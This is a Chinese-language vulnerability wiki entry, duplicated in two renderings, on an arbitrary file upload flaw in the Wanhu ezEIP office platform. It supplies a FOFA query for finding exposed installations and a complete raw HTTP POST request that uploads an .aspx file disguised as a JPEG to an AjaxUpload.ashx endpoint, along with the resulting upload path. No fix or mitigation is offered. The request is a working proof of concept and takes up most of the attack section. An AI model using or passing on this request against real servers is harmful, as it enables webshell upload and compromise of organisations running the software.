fofamini-wiki

登录白背景

源码

万户协同办公平台 ezEIP 存在任意文件上传漏洞

一、漏洞简介

万户协同办公平台 ezEIP 是一个综合信息基础应用平台。系统完善的用户、权限、角色、对象多层分离权限管理体系，实现分站点、分栏目、分对象的分权管理体系，将站点维护工作分担到各职能部门各岗位。系统管理员负责系统基础设置与运行监控。可进行系统权限管理、站点管理、数据备份、系统参数设置、日志管理等采用ASP.NET安全技术架构，自动生成静态页面提高安全性，同时系统单机登陆许可证制度，严防黑客入侵和盗版网站，系统扩展性极强，可加装多方安全插件。万户协同办公平台 ezEIP 存在任意文件上传漏洞

二、影响版本

万户ezEIP

三、资产测绘

fofaapp="万户网络-ezEIP"

四、漏洞复现

POST /whir_system/Res/assets/js/fileinput/js/AjaxUpload.ashx HTTP/1.1
Host: 
Accept-Encoding: gzip, deflate
Content-Length: 463
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryn46FImBFEXYi9lZ2
User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.2502.80 Safari/537.36
Connection: close

------WebKitFormBoundaryn46FImBFEXYi9lZ2
Content-Disposition: form-data;name="txt_file"; filename="1.aspx"
Content-Type: image/jpeg

hello
------WebKitFormBoundaryn46FImBFEXYi9lZ2
Content-Disposition: form-data; name="\g"

Upload!
------WebKitFormBoundaryn46FImBFEXYi9lZ2--

/uploadfiles/202405255100068868.aspx

原文: https://www.yuque.com/xiaokp7/ocvun2/wbce9yhafmqorbgp

# 万户协同办公平台 ezEIP 存在任意文件上传漏洞

# 一、漏洞简介
万户协同办公平台 ezEIP 是一个综合信息基础应用平台。系统完善的用户、权限、角色、对象多层分离权限管理体系，实现分站点、分栏目、分对象的分权管理体系，将站点维护工作分担到各职能部门各岗位。系统管理员负责系统基础设置与运行监控。可进行系统权限管理、站点管理、数据备份、系统参数设置、日志管理等采用ASP.NET安全技术架构，自动生成静态页面提高安全性，同时系统单机登陆许可证制度，严防黑客入侵和盗版网站，系统扩展性极强，可加装多方安全插件。万户协同办公平台 ezEIP 存在任意文件上传漏洞

# 二、影响版本
+ 万户ezEIP

# 三、资产测绘
+ fofa`app="万户网络-ezEIP"`

![1716537686268-203b9bc5-a9b3-4106-aa2e-3eae7290a906.png](./img/WRzbeGYul3S7kJci/1716537686268-203b9bc5-a9b3-4106-aa2e-3eae7290a906-752554.png)

![1716537709500-bd639a50-b0ae-4dfc-805d-af35d68f45ce.png](./img/WRzbeGYul3S7kJci/1716537709500-bd639a50-b0ae-4dfc-805d-af35d68f45ce-876205.png)

# 四、漏洞复现
```plain
POST /whir_system/Res/assets/js/fileinput/js/AjaxUpload.ashx HTTP/1.1
Host: 
Accept-Encoding: gzip, deflate
Content-Length: 463
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryn46FImBFEXYi9lZ2
User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.2502.80 Safari/537.36
Connection: close

------WebKitFormBoundaryn46FImBFEXYi9lZ2
Content-Disposition: form-data;name="txt_file"; filename="1.aspx"
Content-Type: image/jpeg

hello
------WebKitFormBoundaryn46FImBFEXYi9lZ2
Content-Disposition: form-data; name="\g"

Upload!
------WebKitFormBoundaryn46FImBFEXYi9lZ2--
```

![1716569546388-f8a921b0-d30b-4b95-8d1e-6691876d5c87.png](./img/WRzbeGYul3S7kJci/1716569546388-f8a921b0-d30b-4b95-8d1e-6691876d5c87-805349.png)

```plain
/uploadfiles/202405255100068868.aspx
```

![1716569563059-84ef3653-aa3e-4eee-ae45-b770e1c7f9d8.png](./img/WRzbeGYul3S7kJci/1716569563059-84ef3653-aa3e-4eee-ae45-b770e1c7f9d8-502593.png)

> 原文: <https://www.yuque.com/xiaokp7/ocvun2/wbce9yhafmqorbgp>